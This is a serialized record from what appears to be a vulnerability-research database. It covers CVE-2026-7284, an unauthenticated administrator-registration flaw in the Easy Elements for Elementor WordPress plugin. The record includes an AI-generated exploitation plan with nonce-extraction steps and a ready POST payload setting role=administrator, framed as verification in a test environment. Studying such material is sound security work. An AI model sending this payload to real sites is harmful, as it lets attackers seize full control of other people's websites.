[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1W7cQhmVwEVxd6wihp2KAPGArmvB8fElhegrjHTCl-4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-7284","easy-elements-for-elementor-unauthenticated-privilege-escalation-via-easyelhandleregister","Easy Elements for Elementor \u003C= 1.4.4 - Unauthenticated Privilege Escalation via easyel_handle_register","The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site.","easy-elements",null,"\u003C=1.4.4","1.4.5","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-05-19 13:10:24","2026-05-20 01:25:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F32b6ccfe-a659-41e4-9cec-146f4f910071?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fadmin\u002Fadmin.css","assets\u002Fcss\u002Fplugins.css","assets\u002Fcss\u002Fplugins.min.css","assets\u002Fcss\u002Fplugins.scss","assets\u002Fjs\u002Fadmin.js","assets\u002Fjs\u002Fcustom.js","easy-elements.php","includes\u002FAdmin\u002FAdmin_Settings.php","researched",false,3,"This research plan outlines the steps to verify the Critical Privilege Escalation vulnerability in the **Easy Elements for Elementor** plugin (\u003C= 1.4.4).\n\n## 1. Vulnerability Summary\nThe vulnerability exists within the `easyel_handle_register` function (likely an AJAX handler). The function is responsible for processing user registrations via a plugin-provided widget or form. The flaw is a lack of server-side validation or restriction on the `role` parameter. By default, WordPress registration should assign the role defined in \"Settings > General\" (usually `subscriber`), but this function allows the client to specify the role, enabling unauthenticated users to register as an `administrator`.\n\n## 2. Attack Vector Analysis\n* **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n* **Action**: `easyel_handle_register` (Registered for unauthenticated users via `wp_ajax_nopriv_easyel_handle_register`).\n* **Vulnerable Parameter**: `role` (or potentially a nested array key).\n* **Preconditions**:\n * The plugin must be active.\n * WordPress \"Anyone can register\" setting may need to be enabled (though the plugin might bypass this check).\n * A valid AJAX nonce for the registration action is required.\n\n## 3. Code Flow (Inferred)\n1. An unauthenticated user sends a POST request to `admin-ajax.php` with `action=easyel_handle_register`.\n2. The `easyel_handle_register` function is invoked.\n3. The function extracts user details from `$_POST` (e.g., `user_login`, `user_email`, `password`, and `role`).\n4. The function calls `wp_insert_user($userdata)` where `$userdata['role']` is directly populated from the `role` parameter without being checked against a whitelist.\n5. The user is created with the `administrator` role.\n\n## 4. Nonce Acquisition Strategy\nThe registration function likely requires a nonce for security. Since this is an unauthenticated action, the nonce must be exposed on a public-facing page where the registration widget is used.\n\n1. **Identify the Trigger**: The registration functionality is typically part of an \"User Registration\" Elementor widget.\n2. **Create a Target Page**:\n * `wp post create --post_type=page --post_status=publish --post_title=\"Register\" --post_content='[easyel_registration_form]'` (Note: `[easyel_registration_form]` is an inferred shortcode; if it's an Elementor widget, the agent should create a page and use the Elementor editor or find an existing registration page).\n3. **Extract the Nonce**:\n * Navigate to the page using `browser_navigate`.\n * Search the HTML for localized data. Based on `Admin_Settings.php`, nonces are often stored in an object like `easyElementsData`.\n * **Inferred JS Key**: `window.easyel_registration_data?.nonce` or similar.\n * Execution: `browser_eval(\"window.easyElementsData?.nonce || window.easyel_localize?.nonce\")`.\n\n## 5. Exploitation Strategy\nThe agent will attempt to register a new administrator via a direct AJAX request.\n\n* **Tool**: `http_request`\n* **Method**: `POST`\n* **URL**: `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Payload**:\n ```text\n action=easyel_handle_register&\n user_login=hacker_admin&\n user_email=hacker@example.com&\n user_password=Password123!&\n confirm_password=Password123!&\n role=administrator&\n security={{NONCE}}\n ```\n *(Note: Parameter names like `user_password` and `security` are inferred from common WordPress registration patterns and the `easyel_save_user_data_callback` found in `Admin_Settings.php` which uses `security` for its nonce check.)*\n\n## 6. Test Data Setup\n1. **Install\u002FActivate Plugin**: Ensure `easy-elements` version 1.4.4 is installed.\n2. **Plugin Settings**: Ensure the Registration feature is enabled if there is a global toggle in the plugin dashboard.\n3. **WP Settings**: Set `wp option update users_can_register 1`.\n4. **Registration Page**: Create a page that includes the Easy Elements registration form to facilitate nonce extraction.\n\n## 7. Expected Results\n* **Successful Exploit**: The server returns a JSON success message (e.g., `{\"success\":true,\"data\":{...}}`).\n* **Failure**: The server returns `403 Forbidden` (nonce fail) or `400 Bad Request` (missing action), or creates a user with the `subscriber` role instead of `administrator`.\n\n## 8. Verification Steps\nAfter the HTTP request, use WP-CLI to verify the privilege escalation:\n1. **Check User Existence**: `wp user list --field=user_login` (Should see `hacker_admin`).\n2. **Check User Role**: `wp user get hacker_admin --field=roles` (Should return `administrator`).\n\n## 9. Alternative Approaches\nIf `role` is not the correct parameter name, check for:\n* `user_role`\n* `userdata[role]`\n* `settings[role]` (Mapping from the `easyel_save_user_data_callback` pattern seen in the source).\n\nIf the `easyel_handle_register` action is not found, search the plugin directory for the string `wp_ajax_nopriv_` to identify the correct registration action name:\n`grep -r \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Feasy-elements\u002F`","gemini-3-flash-preview","2026-05-20 16:43:20","2026-05-20 16:44:13",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.4.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-elements\u002Ftags\u002F1.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feasy-elements.1.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-elements\u002Ftags\u002F1.4.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feasy-elements.1.4.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-elements\u002Ftags"]